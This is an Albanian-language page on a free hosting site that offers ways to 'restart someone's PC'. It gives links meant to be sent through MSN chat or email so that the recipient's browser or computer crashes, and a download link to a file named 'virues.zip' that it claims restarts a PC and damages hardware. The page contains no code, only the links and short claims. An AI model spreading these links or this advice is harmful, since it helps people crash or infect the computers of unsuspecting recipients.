Me ja ristartu dikujt pc
Programe   Per   PC               - Me ja   Ristartu   dikuj   PC   -

Per me Ristartu dikuj PC veç qoja ket link nepermjet chatit msn apo emailit dhe ati do ti     
restartohet
  Dergoja kete   edhe atij i ristartohet pc :-->   http://ha.ckers.org/imagecrash.html

-   NE Monitor   -


http://212.43.196.62/Blagues5/divers/cestbienvrai.html   qet   shumm   letra ne monitor

-   Kjo   e   ristarton   Pc edhe   e   Djeg   Nje   Pjes   mrena   ne   shtepiz

  qe Linkun   =>   http://rapidshare.de/files/07017398/virues.zip.html


www.argetohu-ks.page.tl ketu gjithqka gjindet!!!
 
 
 
 
 
 
 
Sod ne faqen ton pati 289638 visitors (1419627 hits) Ne ket faqe
This website was created for free with Own-Free-Website.com. Would you also like to have your own website?
Sign up for free